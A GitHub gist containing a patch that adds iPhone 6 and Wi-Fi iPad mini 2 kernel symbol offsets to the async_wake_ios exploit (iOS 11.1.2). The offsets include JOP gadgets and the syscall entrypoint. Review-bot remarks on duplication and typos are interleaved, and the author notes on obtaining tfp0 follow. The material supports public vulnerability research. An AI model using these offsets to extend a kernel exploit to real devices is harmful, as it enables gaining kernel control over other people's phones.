@staaldraad
Last active May 2, 2019 07:02
Add iPhone 6 symbols along with the symbols @cji added for iPad mini 2.
--- async_wake_ios 2/async_wake_ios/symbols.c 2017-12-11 17:01:53.000000000 +0100
+++ async_wake_ios/async_wake_ios/symbols.c 2017-12-13 13:17:32.000000000 +0100
@@ -131,6 +131,50 @@
0xFFFFFFF007194BBC, // KSYMBOL_SLEH_SYNC_EPILOG // look for xrefs to "Unsupported Class %u event code."
};
+uint64_t ksymbols_iphone_6_15b202[] = {
+ 0xFFFFFFF0074A4A4C, // KSYMBOL_OSARRAY_GET_META_CLASS,
+ 0xFFFFFFF007533CF8, // KSYMBOL_IOUSERCLIENT_GET_META_CLASS
+ 0xFFFFFFF0075354A0, // KSYMBOL_IOUSERCLIENT_GET_TARGET_AND_TRAP_FOR_INDEX
+ 0xFFFFFFF0073B71E4, // KSYMBOL_CSBLOB_GET_CD_HASH
+ 0xFFFFFFF0070C8710, // KSYMBOL_KALLOC_EXTERNAL
+ 0xFFFFFFF0070C8740, // KSYMBOL_KFREE
+ 0xFFFFFFF0070C873C, // KYSMBOL_RET
+ 0xFFFFFFF0074BE978, // KSYMBOL_OSSERIALIZER_SERIALIZE,
+ 0xFFFFFFF007559FD0, // KSYMBOL_KPRINTF
+ 0xFFFFFFF0074C9910, // KSYMBOL_UUID_COPY
+ 0xFFFFFFF00757E000, // KSYMBOL_CPU_DATA_ENTRIES // 0x6000 in to the data segment
+ 0xFFFFFFF00709818c, // KSYMBOL_VALID_LINK_REGISTER // look for reference to FAR_EL1 (Fault Address Register (EL1))
+ 0xFFFFFFF007098164, // KSYMBOL_X21_JOP_GADGET // look for references to FPCR (Floating-point Control Register)
+ 0xFFFFFFF007098434, // KSYMBOL_EXCEPTION_RETURN // look for references to Set PSTATE.DAIF [--IF]
+ 0xFFFFFFF0070983E4, // KSYMBOL_THREAD_EXCEPTION_RETURN // a bit before exception_return
+ 0xFFFFFFF0071AD144, // KSYMBOL_SET_MDSCR_EL1_GADGET // look for references to MDSCR_EL1
+ 0xFFFFFFF0074062F4, // KSYMBOL_WRITE_SYSCALL_ENTRYPOINT // look for references to enosys to find the syscall table (this is actually 1 instruction in to the entrypoint)
+ 0xFFFFFFF0071A90C0, // KSYMBOL_EL1_HW_BP_INFINITE_LOOP // look for xrefs to "ESR (0x%x) for instruction trapped" and find switch case 49
+ 0xFFFFFFF0071A9ABC, // KSYMBOL_SLEH_SYNC_EPILOG // look for xrefs to "Unsupported Class %u event code."
+};
+
+uint64_t ksymbols_ipad_mini_2_wifi_15b202[] = {
+ 0xFFFFFFF0074947EC, // KSYMBOL_OSARRAY_GET_META_CLASS,
+ 0xFFFFFFF007523A98, // KSYMBOL_IOUSERCLIENT_GET_META_CLASS
+ 0xFFFFFFF007525240, // KSYMBOL_IOUSERCLIENT_GET_TARGET_AND_TRAP_FOR_INDEX
+ 0xFFFFFFF0073A6F84, // KSYMBOL_CSBLOB_GET_CD_HASH
+ 0xFFFFFFF0070B8590, // KSYMBOL_KALLOC_EXTERNAL
+ 0xFFFFFFF0070B85C0, // KSYMBOL_KFREE
+ 0xFFFFFFF0070B85BC, // KYSMBOL_RET
+ 0xFFFFFFF0074AE718, // KSYMBOL_OSSERIALIZER_SERIALIZE,
+ 0xFFFFFFF007549D40, // KSYMBOL_KPRINTF
+ 0xFFFFFFF0074B96B0, // KSYMBOL_UUID_COPY
+ 0xFFFFFFF00756E000, // KSYMBOL_CPU_DATA_ENTRIES // 0x6000 in to the data segment
+ 0xFFFFFFF00708818C, // KSYMBOL_VALID_LINK_REGISTER // look for reference to FAR_EL1 (Fault Address Register (EL1))
+ 0xFFFFFFF007088164, // KSYMBOL_X21_JOP_GADGET // look for references to FPCR (Floating-point Control Register)
+ 0xFFFFFFF007088434, // KSYMBOL_EXCEPTION_RETURN // look for references to Set PSTATE.DAIF [--IF]
+ 0xFFFFFFF0070883E4, // KSYMBOL_THREAD_EXCEPTION_RETURN // a bit before exception_return
+ 0xFFFFFFF00719CF44, // KSYMBOL_SET_MDSCR_EL1_GADGET // look for references to MDSCR_EL1
+ 0xFFFFFFF0073F6094, // KSYMBOL_WRITE_SYSCALL_ENTRYPOINT // look for references to enosys to find the syscall table (this is actually 1 instruction in to the entrypoint)
+ 0xFFFFFFF007198EC0, // KSYMBOL_EL1_HW_BP_INFINITE_LOOP // look for xrefs to "ESR (0x%x) for instruction trapped" and find switch case 49
+ 0xfffffff0071998BC, // KSYMBOL_SLEH_SYNC_EPILOG // look for xrefs to "Unsupported Class %u event code."
+};
+
uint64_t ksym(enum ksymbol sym) {
if (kernel_base == 0) {
if (!have_kmem_read()) {
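Review bot: ksymbols_iphone_6_15b202 is a second copy of a table that already exists; the discussion below this patch states that all 18 symbol locations are identical between the iPhone 6 and the iPod touch 6G, so the iPhone7,2 branch could point at ksymbols_ipod_touch_6g_15b202 instead of carrying a duplicate array that can drift from it. Two smaller points in the same hunk: the last entry of ksymbols_ipad_mini_2_wifi_15b202 is written `0xfffffff0071998BC` in mixed-case hex while every other literal in both arrays is uppercase, and the comment `KYSMBOL_RET` misspells KSYMBOL in both new arrays; since these arrays are indexed positionally by `enum ksymbol`, the comments are the only record of which slot is which, so they are worth keeping exact.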
@@ -194,6 +238,14 @@
printf("this is iPhone 6s, should work!\n");
symbols = ksymbols_iphone_6s_15b202;
have_syms = 1;
+ } else if (strstr(u.machine, "iPhone7,2")) {
+ printf("this is iPhone 6, should work!\n!\n");
+ symbols = ksymbols_iphone_6_15b202;
+ have_syms = 1;
+ } else if (strstr(u.machine, "iPad4,4")) {
+ printf("this is iPad Mini 2 WiFi, should work!\n");
+ symbols = ksymbols_ipad_mini_2_wifi_15b202;
+ have_syms = 1;
} else {
printf("no symbols for this device yet\n");
printf("tfp0 should still work, but the kernel debugger PoC won't\n");
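Review bot: the iPhone 6 status message has a stray second line: `printf("this is iPhone 6, should work!\n!\n");` prints a lone "!" after the status line, so drop the trailing `!\n` to match the neighbouring messages. The `strstr(u.machine, "iPad4,4")` check matches only the Wi-Fi iPad mini 2, which is consistent with the table name (ksymbols_ipad_mini_2_wifi_15b202); the cellular variants fall through to the "no symbols for this device yet" branch, which is the correct outcome given that no table was extracted for them.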

Original Sploit: https://bugs.chromium.org/p/project-zero/issues/detail?id=1417#c3
CJI patch: https://gist.github.com/cji/32498b19ca0bf0536f5f40cc9b0881cc

Used @cji's great blog-post to extract these: https://medium.com/@cji_/hunting-for-ios-kernel-symbols-e48a446bb00

Turns out that the iPhone 6 and iPod 6G symbols are the same... I thought 16 of the 18 were identical. Tried running the exploit against the iPhone 6 using the iPod 6G symbols and managed to hit the 1/10 times this sploit fails. So I stuck to my working symbols. My symbols got you tfp0 but the debugger wasn't working. I recalculated and found that actually 18/18 symbol locations are identical between the two devices.

So you can actually just change the detection branch for iPhone 6 to this (reusing the iPod touch 6G table instead of a separate iPhone 6 array):

    printf("this is iPhone 6, should work!\n");
    symbols = ksymbols_ipod_touch_6g_15b202;
    have_syms = 1;